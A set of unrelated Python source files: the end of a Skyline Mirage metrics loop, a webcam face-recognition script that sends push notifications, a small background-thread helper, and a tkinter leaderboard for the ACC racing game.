logger.info('seconds to run :: %.2f' % run_time)
graphite_run_time = '%.2f' % run_time
send_metric_name = skyline_app_graphite_namespace + '.run_time'
send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Add the mirage metric and its EXPIRATION_TIME to
# the mirage.metrics_expiration_times so that Mirage
# can determine the metric EXPIRATION_TIME without
# having to create and iterate the all_alerts
# object in the Mirage analysis phase so that the
# reported anomaly timestamp can be used to determine
# whether the EXPIRATION_TIME should be applied to a
# batch metric in the alerting and Ionosphere contexts
# @modified 20201107 - Feature #3830: metrics_manager
# Use metrics_manager data, now managed there
# mirage_metrics_expiration_times = []
# try:
# mirage_metrics_expiration_times = list(self.redis_conn_decoded.smembers('mirage.metrics_expiration_times'))
# if LOCAL_DEBUG:
# logger.info('debug :: fetched the mirage.metrics_expiration_times Redis set')
# except:
# logger.info('failed to fetch the mirage.metrics_expiration_times Redis set')
# mirage_metrics_expiration_times = []
# try:
# mirage_unique_metrics = list(self.redis_conn_decoded.smembers('mirage.unique_metrics'))
# mirage_unique_metrics_count = len(mirage_unique_metrics)
# logger.info('mirage.unique_metrics Redis set count - %s' % str(mirage_unique_metrics_count))
# if LOCAL_DEBUG:
# logger.info('debug :: fetched the mirage.unique_metrics Redis set')
# logger.info('debug :: %s' % str(mirage_unique_metrics))
# except:
# logger.info('failed to fetch the mirage.unique_metrics Redis set')
# mirage_unique_metrics == []
# for metric in mirage_unique_metrics:
# if metric.startswith(settings.FULL_NAMESPACE):
# base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
# else:
# base_name = metric
# mirage_alert_expiration_data = [base_name, int(alert[2])]
# if str(mirage_alert_expiration_data) not in mirage_metrics_expiration_times:
# try:
# self.redis_conn.sadd('mirage.metrics_expiration_times', str(mirage_alert_expiration_data))
# if LOCAL_DEBUG:
# logger.info('debug :: added %s to mirage.metrics_expiration_times' % str(mirage_alert_expiration_data))
# except:
# if LOCAL_DEBUG:
# logger.error('error :: failed to add %s to mirage.metrics_expiration_times set' % str(mirage_alert_expiration_data))
# Reset counters
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.anomalous_metrics[:] = []
# self.not_anomalous_metrics[:] = []
# Reset metric_variables
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.metric_variables[:] = []
# self.sent_to_crucible[:] = []
# self.sent_to_panorama[:] = []
# self.sent_to_ionosphere[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
delete_redis_sets = [
'mirage.anomalous_metrics',
'mirage.not_anomalous_metrics',
'mirage.metric_variables',
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Handle once per minute
# 'mirage.sent_to_crucible',
# 'mirage.sent_to_panorama',
# 'mirage.sent_to_ionosphere',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
for i in get_objects():
after[type(i)] += 1
gc_results = [(k, after[k] - before[k]) for k in after if after[k] - before[k]]
for gc_result in gc_results:
logger.info('debug :: %s' % str(gc_result))
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
# show the dirt ;-)
try:
logger.info('garbage collecting')
all_the_garbage = self.dump_garbage()
except:
logger.error('error :: during garbage collecting')
logger.error(traceback.format_exc())
all_the_garbage = 'gc errored'
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info(all_the_garbage)
logger.info('garbage collected')
if LOCAL_DEBUG:
logger.info('debug :: Memory usage end of run: %s (kb)' % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
# Send checks.stale_discarded and checks.pending metrics
if int(time()) >= (last_sent_to_graphite + 60):
stale_check_discarded = []
try:
stale_check_discarded = list(self.redis_conn_decoded.smembers('mirage.stale_check_discarded'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get mirage.stale_check_discarded set from Redis')
stale_check_discarded = []
stale_check_discarded_count = len(stale_check_discarded)
logger.info('checks.stale_discarded :: %s' % str(stale_check_discarded_count))
send_metric_name = '%s.checks.stale_discarded' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(stale_check_discarded_count))
checks_pending = [f_pending for f_pending in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f_pending))]
checks_pending_count = len(checks_pending)
logger.info('checks.pending :: %s' % str(checks_pending_count))
send_metric_name = '%s.checks.pending' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(checks_pending_count))
checks_done = []
try:
checks_done = list(self.redis_conn_decoded.smembers('mirage.checks.done'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get mirage.checks.done set from Redis')
checks_done = []
checks_done_count = len(checks_done)
logger.info('checks.done :: %s' % str(checks_done_count))
send_metric_name = '%s.checks.done' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(checks_done_count))
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Only send panorama, ionosphere and crucible metrics once a minute
if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_crucible = str(len(self.sent_to_crucible))#
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_crucible = str(len(list(self.redis_conn.smembers('mirage.sent_to_crucible'))))
sent_to_crucible = str(len(list(self.redis_conn_decoded.smembers('mirage.sent_to_crucible'))))
except:
sent_to_crucible = '0'
logger.info('sent_to_crucible :: %s' % sent_to_crucible)
send_metric_name = '%s.sent_to_crucible' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_crucible)
if settings.PANORAMA_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_panorama = str(len(self.sent_to_panorama))
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_panorama = str(len(list(self.redis_conn.smembers('mirage.sent_to_panorama'))))
sent_to_panorama = str(len(list(self.redis_conn_decoded.smembers('mirage.sent_to_panorama'))))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
if settings.IONOSPHERE_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_ionosphere = str(len(self.sent_to_ionosphere))
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_ionosphere = str(len(list(self.redis_conn.smembers('mirage.sent_to_ionosphere'))))
sent_to_ionosphere = str(len(list(self.redis_conn_decoded.smembers('mirage.sent_to_ionosphere'))))
except Exception as e:
logger.error('error :: could not determine sent_to_ionosphere: %s' % e)
sent_to_ionosphere = '0'
logger.info('sent_to_ionosphere :: %s' % sent_to_ionosphere)
send_metric_name = '%s.sent_to_ionosphere' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_ionosphere)
last_sent_to_graphite = int(time())
delete_redis_sets = [
'mirage.sent_to_crucible',
'mirage.sent_to_panorama',
'mirage.sent_to_ionosphere',
'mirage.stale_check_discarded',
'mirage.checks.done',
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
mirage_snab_only_checks_redis_set,
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
# Sleep if it went too fast
if time() - now < 1:
logger.info('sleeping due to low run time...')
# sleep(10)
sleep(1)
|
test.py
|
from threading import Thread, Lock
import time, os, sys, shutil
import imutils
import cv2
import numpy as np
sys.path.append('.')
import tensorflow as tf
import detect_face_detection
import urllib.request
import zerorpc
import send_notifications
import image_upload
url='http://172.25.97.64:8080/shot.jpg'
dir_path = os.path.dirname(os.path.realpath(__file__))
UPLOAD_FOLDER = dir_path + "\\images"
arr = list()
print("Loading Module")
class WebcamVideoStream :
def __init__(self, src = 0, width = 1920, height = 1080) :
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
self.started = False
self.read_lock = Lock()
def start(self) :
if self.started :
print ("already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self) :
while self.started :
(grabbed, frame) = self.stream.read()
self.read_lock.acquire()
self.grabbed, self.frame = grabbed, frame
self.read_lock.release()
def read(self) :
self.read_lock.acquire()
frame = self.frame.copy()
self.read_lock.release()
return frame
def stop(self) :
self.started = False
self.thread.join()
def __exit__(self, exc_type, exc_value, traceback) :
self.stream.release()
# def process(self):
# self.thread.start()
# return self
if __name__ == "__main__" :
vs = WebcamVideoStream().start()
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
if os.path.exists("images"):
shutil.rmtree("images")
os.mkdir('images')
minsize = 25 # minimum size of face
threshold = [ 0.6, 0.7, 0.7 ] # detection thresholds for the three MTCNN stages (P-Net, R-Net, O-Net)
factor = 0.709 # scale factor
fps = 0
frame_num = 60
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.30)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = detect_face_detection.create_mtcnn(sess, None)
while True :
imgResponse = urllib.request.urlopen(url)
imgNp = np.array(bytearray(imgResponse.read()),dtype=np.uint8)
imgs = cv2.imdecode(imgNp,-1)
# fps = FPS().start()
start_time = time.time()
frame = vs.read()
img = frame[:,:,0:3] # note: not used below; detection runs on the IP-camera image (imgs)
boxes, _ = detect_face_detection.detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor)
for i in range(boxes.shape[0]):
pt1 = (int(boxes[i][0]), int(boxes[i][1]))
pt2 = (int(boxes[i][2]), int(boxes[i][3]))
x = int(boxes[i][0]) - 150
y = int(boxes[i][1]) - 150
w = int(boxes[i][2]) + 190
h = int(boxes[i][3]) + 150
frame = cv2.rectangle(imgs, (x,y), (w, h), color=(0, 255, 0))
frame_info = 'Frame: {0}, FPS: {1:.2f}'.format(frame_num, fps)
# if(float(boxes[i][4]) >= 0.90):
sub_faces = frame[y:h, x:w]
# sub_faces = frame[p1, p2]
stamp = str(time.time())
filename = "face_" + stamp + ".jpg"
path = UPLOAD_FOLDER + "\\" + filename
cv2.imwrite(path, sub_faces)
result = c.classifyFile(path)
# print(type(result[0]) == dict)
if (len(result) != 0):
if (type(result[0]) == dict and len(result[0]['candidates']) != 0):
# result[0]['candidates']['name']
if(result[0]['candidates']['name'] != 'Not Recognized'):
print(result[0])
recognized_faces = result[0]
cv2.putText(imgs, recognized_faces['candidates']['name'], (x,y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
if not recognized_faces['candidates']['name'] in arr:
upload_response = image_upload.upload(filename)
response = send_notifications.send_push_notification(upload_response['url'], recognized_faces['candidates']['name'])
# if (response.status_code == 200):
# print(response)
arr.append(recognized_faces['candidates']['name'])
# os.remove(path)
else:
cv2.putText(imgs, "Not Recognized", (x,y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
if os.path.exists(path):
os.remove(path)
end_time = time.time()
fps = fps * 0.9 + 1/(end_time - start_time) * 60
# fps = (end_time - start_time) / frame_num
frame_info = 'Frame: {0}, FPS: {1:.2f}'.format(frame_num, fps)
cv2.putText(imgs, frame_info, (10, frame.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
cv2.imshow('webcam', imgs)
# cv2.putText(img, frame_info, (10, frame.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
# cv2.imshow('video', imgs)
if cv2.waitKey(1) & 0xFF == ord('q') :
break
# fps.update()
# fps.stop()
vs.stop()
cv2.destroyAllWindows()
|
background_thread.py
|
from typing import Callable
from threading import Thread
class BackgroundThread(object):
_thread = None
def __init__(self, target):
# type: (Callable) -> None
self._thread = Thread(target=target)
self._thread.daemon = True
def is_alive(self):
# type: () -> bool
return self._thread.is_alive()
def start(self):
# type: () -> None
self._thread.start()
def join(self):
# type: () -> None
self._thread.join()
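# A minimal usage sketch (not part of the original module): wrap a callable in
# BackgroundThread so it runs on a daemon thread, then wait for it to finish.
# The `work` function is a hypothetical example target.
if __name__ == "__main__":
    import time

    def work():
        # Simulate a short-lived background task.
        time.sleep(0.1)
        print("background work done")

    worker = BackgroundThread(target=work)
    worker.start()
    print("is_alive:", worker.is_alive())
    worker.join()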
|
main.py
|
import copy
import datetime
import json
from PIL import Image, ImageTk
import queue
import logging
import socket
import sys
import time
import threading
import tkinter as tk
from tkinter.font import Font
import accProtocol
def load_images() -> dict:
with open("./cars.json", "r") as fp:
car_data = json.load(fp)
image_cache = {}
for car_model in car_data.keys():
name = car_data[car_model]["Brand"]
if name not in image_cache:
file = Image.open(f"images/logos/{name}.png")
image = ImageTk.PhotoImage(file)
image_cache[name] = image
file.close()
car_data[car_model]["Logo"] = image_cache[name]
return car_data
def from_ms(time: int) -> str:
"""
Convert milliseconds into a string in the format m:ss.mmm
"""
minute = time // 60_000
second = time // 1000 - minute * 60
millisecond = time - minute * 60_000 - second * 1000
if second < 10:
second = "0" + str(second)
else:
second = str(second)
if millisecond < 10:
millisecond = f"00{millisecond}"
elif millisecond < 100:
millisecond = f"0{millisecond}"
else:
millisecond = str(millisecond)
return f"{minute}:{second}.{millisecond}"
def from_date_time(time: datetime.datetime) -> str:
"""
Return a string in format hh:mm:ss
"""
days = time.day - 1
hours = time.hour
minutes = time.minute
seconds = time.second
hours = days * 24 + hours - 1
if hours < 10:
hours = f"0{hours}"
if minutes < 10:
minutes = f"0{minutes}"
if seconds < 10:
seconds = f"0{seconds}"
return f"{hours}:{minutes}:{seconds}"
def create_cell(parent, text, bg="white", font=None, max_width=0,
height=1, anchor=tk.CENTER, relief=tk.FLAT):
width = len(text)
if max_width > 0:
width = max_width
if font:
cell = tk.Label(
parent, text=text, bg=bg, width=width, height=height,
justify=tk.LEFT, anchor=anchor, font=font, relief=relief)
else:
cell = tk.Label(
parent, text=text, bg=bg, width=width, height=height,
justify=tk.LEFT, anchor=anchor, relief=relief)
return cell
class Table(tk.Frame):
def __init__(self, parent, font, header, color_1, color_2, row=1) -> None:
tk.Frame.__init__(self, parent)
self.row = row
self.column = len(header)
self.labels = []
self.old_entries = []
self.color_1 = color_1
self.color_2 = color_2
self.car_data = load_images()
for i in range(self.row):
column_labels = []
for j in range(self.column):
width = header[j]["width"]
if i % 2 == 0:
background = self.color_1
else:
background = self.color_2
if j == 4:
label = create_cell(
parent, "", background, font, width, 2, tk.W)
else:
label = create_cell(parent, "", background, font, width, 2)
label.grid(row=i, column=j, padx=1, sticky=tk.NSEW)
column_labels.append(label)
self.labels.append(column_labels)
def order_entries_by_position(self, data) -> list:
entries = []
position = 1
data_entries = data["entries"]
nb_entries = len(data_entries)
while position <= nb_entries:
for entry in data_entries.keys():
if (len(data_entries[entry]) > 0 and
position == data_entries[entry]["position"]):
entries.append(data_entries[entry])
position += 1
return entries
def update_position(self, x, y, entry, no_prev_entries):
# TODO: clean up this error handling
try:
position = entry["position"]
if (no_prev_entries or
self.old_entries[y]["position"] != position):
string = position
self.labels[y][x].configure(text=string)
except IndexError:
print(position)
print(no_prev_entries)
print(y)
print(self.old_entries)
breakpoint()
def update_car_number(self, x, y, entry, no_prev_entries):
car_number = entry["car_number"]
if (no_prev_entries or
self.old_entries[y]["car_number"] != car_number):
string = car_number
self.labels[y][x].configure(text=string)
def update_cup_category(self, x, y, entry, no_prev_entries):
cup_category = entry["cup_category"]
if (no_prev_entries or
self.old_entries[y]["cup_category"] != cup_category):
string = cup_category
self.labels[y][x].configure(text=string)
def update_car_logo(self, x, y, entry, no_prev_entries):
model_number = entry["manufacturer"]
if (no_prev_entries or
self.old_entries[y]["manufacturer"] != model_number):
logo = self.car_data[str(model_number)]["Logo"]
if y % 2 == 0:
color = self.color_1
else:
color = self.color_2
label = tk.Label(self.master, bg=color, image=logo)
label.image = logo
label.place(x=0, y=0)
label.grid(row=y, column=x, padx=1, sticky=tk.NSEW)
self.labels[y][x] = label
def update_driver(self, x, y, entry, no_prev_entries):
first_name = entry["driver"]['first_name']
last_name = entry["driver"]['last_name']
if (no_prev_entries or
(self.old_entries[y]["driver"]["first_name"] != first_name and
self.old_entries[y]["driver"]["last_name"] != last_name)):
team = entry["team"]
string = f"{team}\n{first_name} {last_name}"
self.labels[y][x].configure(text=string)
def update_lap_time(self, x, y, lap_type, lap, no_prev_entries):
if (no_prev_entries or
self.old_entries[y][lap_type] != lap):
string = from_ms(lap)
self.labels[y][x].configure(text=string)
def update_lap_counter(self, x, y, entry, no_prev_entries):
laps = entry["lap"]
if no_prev_entries or self.old_entries[y]["lap"] != laps:
string = laps
self.labels[y][x].configure(text=string)
def update_sector(self, x, y, sector, time, no_prev_entries):
if (no_prev_entries or
(len(self.old_entries[y]["sectors"]) == 0 or
self.old_entries[y]["sectors"][sector] != time)):
string = from_ms(time)
self.labels[y][x].configure(text=string)
def update_pit_counter(self, x, y, entry, local_data):
car_id = entry["car_id"]
pits = local_data[car_id]["pits"]
string = f"{pits}"
self.labels[y][x].configure(text=string)
def update_location(self, x, y, entry, no_prev_entries):
location = entry["car_location"]
if (no_prev_entries or
self.old_entries[y]["car_location"] != location):
if location == "Track":
string = ""
if y % 2 == 0:
color = self.color_1
else:
color = self.color_2
else:
# Gas station emoji
string = "\u26FD"
if location == "Pitlane":
color = "red"
elif location == "PitEntry":
color = "blue"
elif location == "PitExit":
color = "green"
else:
# edge case: the location is sometimes none during a
# pit-to-track transition, presumably
color = "purple"
self.labels[y][x].configure(text=string, bg=color)
def update_text(self, data, local_data):
entries = self.order_entries_by_position(data)
nb_entries = len(data["entries"])
if nb_entries == 0 or len(entries) == 0:
return
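# Column layout: 0=position, 1=car number, 2=cup category, 3=car logo,
# 4=team/driver, 5=best lap, 6=current lap, 7=lap count, 8=last lap,
# 9-11=sectors 1-3, 12=pit stops, 13=car location.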
for grid_y in range(nb_entries):
for grid_x in range(self.column):
# no previous entry has been recorded yet for this row
no_prev_entries = grid_y >= len(self.old_entries)
entry = entries[grid_y]
if grid_x == 0:
self.update_position(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 1:
self.update_car_number(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 2:
self.update_cup_category(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 3:
self.update_car_logo(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 4:
self.update_driver(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 5:
self.update_lap_time(
grid_x, grid_y, "best_session_lap",
entry["best_session_lap"], no_prev_entries)
elif grid_x == 6:
self.update_lap_time(
grid_x, grid_y, "current_lap",
entry["current_lap"], no_prev_entries)
elif grid_x == 7:
self.update_lap_counter(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 8:
self.update_lap_time(
grid_x, grid_y, "last_lap",
entry["last_lap"], no_prev_entries)
elif grid_x == 9 and len(entries[grid_y]["sectors"]) > 0:
self.update_sector(
grid_x, grid_y, 0,
entries[grid_y]["sectors"][0], no_prev_entries)
elif grid_x == 10 and len(entries[grid_y]["sectors"]) > 0:
self.update_sector(
grid_x, grid_y, 1,
entries[grid_y]["sectors"][1], no_prev_entries)
elif grid_x == 11 and len(entries[grid_y]["sectors"]) > 0:
self.update_sector(
grid_x, grid_y, 2,
entries[grid_y]["sectors"][2], no_prev_entries)
elif grid_x == 12:
self.update_pit_counter(grid_x, grid_y, entry, local_data)
elif grid_x == 13:
self.update_location(
grid_x, grid_y, entry, no_prev_entries)
else:
self.labels[grid_y][grid_x].configure(text="")
self.old_entries = copy.deepcopy(entries)
def clear_entries(self) -> None:
"""
Clear all entries in the table
"""
for grid_y in range(self.row):
for grid_x in range(self.column):
self.labels[grid_y][grid_x].configure(text="")
class App(tk.Tk):
def __init__(self, queue_in=None, info=None, *args, **kargs) -> None:
tk.Tk.__init__(self, *args, **kargs)
self.title("PyAccLeaderboard")
self.configure(background="black")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.font = Font(family="calibri", size=11)
self.info_font = Font(family="calibri", size=12)
# Base Frame
main_frame = tk.Frame(self, bg="black")
main_frame.grid(sticky=tk.NSEW)
main_frame.columnconfigure(0, weight=1)
# App Frame for the leaderboard and other info
app_frame = tk.Frame(main_frame, bd=2, relief=tk.SUNKEN)
app_frame.grid(row=0, column=1, sticky=tk.NSEW)
# Side Frame with track map and session info
# and application info
side_frame = tk.Frame(main_frame, bd=2)
side_frame.grid(row=0, column=0, sticky=tk.NSEW)
# Session Information
info_frame = tk.Frame(side_frame, bd=2, relief=tk.SUNKEN)
info_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.session_info = []
self.build_session_info(info_frame, info["info"])
# Canvas to draw car positions in real time
# Not working in ACC 1.5.9 :(
self.map_canvas = tk.Canvas(
side_frame, bd=2, width=256, height=256, relief=tk.SUNKEN)
self.map_canvas.grid(row=1, column=0, sticky=tk.NSEW)
# Application info
app_info_frame = tk.Frame(side_frame, bd=2, relief=tk.SUNKEN)
app_info_frame.grid(row=2, column=0)
self.app_info = []
self.create_app_info(app_info_frame)
# Create a Frame with the header
header_frame = tk.Frame(app_frame)
header_frame.grid(row=0, column=0, sticky=tk.NW, pady=(2, 0))
self.build_header(header_frame, info["table"])
frame_canvas = tk.Frame(app_frame)
frame_canvas.grid(row=1, column=0, pady=(5, 0), sticky=tk.NW)
canvas = tk.Canvas(frame_canvas)
canvas.grid(row=0, column=0, sticky=tk.NW)
# Create vertical scrollbar to move the table
v_scrollbar = tk.Scrollbar(
main_frame, orient=tk.VERTICAL, command=canvas.yview)
v_scrollbar.grid(row=0, column=2, sticky=tk.NS)
canvas.configure(yscrollcommand=v_scrollbar.set)
table_frame = tk.Frame(canvas)
self.table = Table(
table_frame, self.font, info["table"], "#c0c0c0", "#a0a0a0", 82)
canvas.create_window((0, 0), window=table_frame, anchor=tk.NW)
table_frame.update_idletasks()
bbox = canvas.bbox(tk.ALL)
w, h = bbox[2] - bbox[0], bbox[3] - bbox[1]
# show the full table width but only 14 of the 82 rows; the rest is reachable via the scrollbar
dw, dh = int((w / 14) * 14), int((h / 82) * 14)
canvas.configure(scrollregion=bbox, width=dw, height=dh)
self.queue_in = queue_in
self.data = None
self.local_data = {
"session": "",
"entries": {}
}
self.local_car_ids = []
self.delay = 500
self.after(self.delay, self.read_queue)
def read_queue(self) -> None:
logging.debug("Read Queue: reading queue")
# start = time.perf_counter()
try:
new_data = self.queue_in.get_nowait()
valid_data = True
for entry in new_data["entries"]:
if len(new_data["entries"][entry]) == 0:
valid_data = False
if valid_data:
self.data = new_data
self.update_local_entries()
self.table.update_text(self.data, self.local_data["entries"])
self.update_session()
# self.update_map() # Not working, ACC side
# end = time.perf_counter()
# print(f"Time: {(end - start) * 1000:.1f} ms")
self.update_app_info()
except queue.Empty:
logging.debug("Read Queue: queue empty")
self.after(self.delay, self.read_queue)
def create_app_info(self, parent):
cell_id = create_cell(
parent, "ID: ", font=self.info_font, anchor=tk.W,
relief=tk.RIDGE, max_width=32)
cell_id.grid(row=0, column=0, sticky=tk.NSEW)
self.app_info.append(cell_id)
cell_connected = create_cell(
parent, "Connected: ", font=self.info_font, anchor=tk.W,
relief=tk.RIDGE, max_width=32)
cell_connected.grid(row=1, column=0, sticky=tk.NSEW)
self.app_info.append(cell_connected)
info_text = "Made With love by Ryan Rennoir\nVersion 0.7.3"
cell_info = create_cell(
parent, info_text, font=self.info_font, anchor=tk.W,
relief=tk.RIDGE, max_width=32, height=2)
cell_info.grid(row=2, column=0, sticky=tk.NSEW)
# self.app_info.append(cell_info) is not needed: this cell is never updated
def update_app_info(self):
for i, cell in enumerate(self.app_info):
if i == 0:
c_id = self.data["connection"]["id"]
cell.configure(text=f"ID: {c_id}")
if i == 1:
connected = self.data["connection"]["connected"]
if connected:
cell.configure(text=f"Connected: {connected}", bg="green")
else:
cell.configure(text=f"Connected: {connected}", bg="red")
def update_map(self):
# Not working in ACC 1.5.9
# world pos x and y are always 0 :(
for key in self.data["entries"].keys():
_ = self.data["entries"][key]["world_pos_x"]
_ = self.data["entries"][key]["world_pos_y"]
# self.map_canvas.create_oval(x, y, x + 1, y + 1, fill="red")
def update_local_entries(self) -> None:
entries = self.data["entries"]
local_entries = self.local_data["entries"]
session = self.data["session"]["session_type"]
local_session = self.local_data["session"]
new_entries = False
if len(entries) != len(local_entries):
new_entries = True
else:
for key in entries.keys():
if entries[key]["car_id"] not in local_entries:
new_entries = True
if new_entries:
logging.debug("Reviced new entry list")
new_data = {}
for key in entries.keys():
car_id = entries[key]["car_id"]
if car_id in local_entries:
new_data.update({car_id: local_entries[car_id]})
else:
new_data.update({car_id: {
"location": "Pitlane",
"pits": 0
}})
self.local_data.update({"entries": new_data})
logging.debug("Clearing leaderboard cell...")
self.table.clear_entries()
elif session != local_session:
for car_id in local_entries:
local_entries.update({car_id: {
"location": "Pitlane",
"pits": 0
}})
self.local_data["session"] = session
else:
for car_id in local_entries:
previous = local_entries[car_id]["location"]
actual = entries[car_id]["car_location"]
if previous == "Track" and actual != "Track":
local_entries[car_id]["pits"] += 1
local_entries[car_id]["location"] = actual
def build_session_info(self, parent, info) -> None:
for i in range(len(info)):
width = 32 # info[i]["width"]
cell = create_cell(
parent, "", font=self.info_font,
max_width=width, relief=tk.RIDGE, anchor=tk.W)
cell.grid(row=i, column=0, pady=2, sticky=tk.NW)
self.session_info.append(cell)
def update_session(self) -> None:
session = self.data["session"]
if len(session) > 0:
for i, cell in enumerate(self.session_info):
if i == 0:
cell.configure(text=f"Track: {session['track']}")
if i == 1:
cell.configure(text=f"Session: {session['session_type']}")
elif i == 2:
time_left = from_date_time(session["session_end_time"])
cell.configure(text=f"Time left: {time_left}")
elif i == 3:
time_elapsed = from_date_time(session['session_time'])
cell.configure(text=f"Time elapsed: {time_elapsed}")
elif i == 4:
air_temps = session["air_temp"]
cell.configure(text=f"Air: {air_temps}°C")
elif i == 5:
track_temps = session["track_temp"]
cell.configure(text=f"Track: {track_temps}°C")
def build_header(self, parent, header) -> None:
for column, info in enumerate(header):
text = info["text"]
color = "#8a8a8a"
width = info["width"]
if column == 4:
# Put Team and Driver name to the far left of the cell
cell = create_cell(parent, text, color,
self.font, width, 2, tk.W)
else:
cell = create_cell(parent, text, color, self.font, width, 2)
if column == 0:
cell.grid(row=0, column=column, padx=(3, 1), sticky=tk.NSEW)
else:
cell.grid(row=0, column=column, padx=1, sticky=tk.NSEW)
def acc_run(info: dict, q: queue.Queue):
logging.debug("Starting ACC Worker Thread...")
global stop_worker
socket = info["socket"]
ip = info["ip"]
port = info["port"]
name = info["name"]
password = info["password"]
speed = info["speed"]
cmd_password = info["cmd_password"]
instance = accProtocol.Leaderboard(socket, ip, port)
instance.connect(name, password, speed, cmd_password)
last_connection = datetime.datetime.now()
last_message = datetime.datetime.now()
while not stop_worker:
now = datetime.datetime.now()
# if connection was lost or not established wait 2s before asking again
if (not instance.connected and
(now - last_connection).total_seconds() > 2):
instance.connect(name, password, speed, cmd_password)
last_connection = datetime.datetime.now()
else:
instance.update()
# Send data to the queue at the same rate
# as the GUI checks the queue
if (now - last_message).total_seconds() > 0.550:
data_copy = copy.deepcopy(instance.leaderboard_data)
last_message = now
q.put(data_copy)
logging.debug("Closing ACC Worker Thread...")
instance.disconnect()
stop_worker = False
if __name__ == "__main__":
gui_info = {
"info": [
{
"layout": "Track",
"width": 20
},
{
"layout": "Session",
"width": 16
},
{
"layout": "Time left",
"width": 17
},
{
"layout": "Time elapsed",
"width": 21
},
{
"layout": "Air Temps",
"width": 9
},
{
"layout": "Track Temps",
"width": 11
}
],
"table": [
{
"text": "Rank",
"width": 4
},
{
"text": "Car",
"width": 3
},
{
"text": "Class",
"width": 5
},
{
"text": "Brand",
"width": 5
},
{
"text": "Team\nDriver",
"width": 30
},
{
"text": "Best",
"width": 8
},
{
"text": "Current",
"width": 8
},
{
"text": "Lap",
"width": 3
},
{
"text": "Last\nGap",
"width": 8
},
{
"text": "S1",
"width": 8
},
{
"text": "S2",
"width": 8
},
{
"text": "S3",
"width": 8
},
{
"text": "Stops",
"width": 5
},
{
# Location
"text": "",
"width": 3
}
]
}
args = sys.argv
argc = len(args)
ip = "127.0.0.1"
port = 9000
for arg in args:
if arg.startswith("-ip"):
ip = arg[3:]
if arg.startswith("-p"):
port = int(arg[2:])
log_format = "%(asctime)s - %(levelname)s: %(message)s"
time_format = "%H:%M:%S"
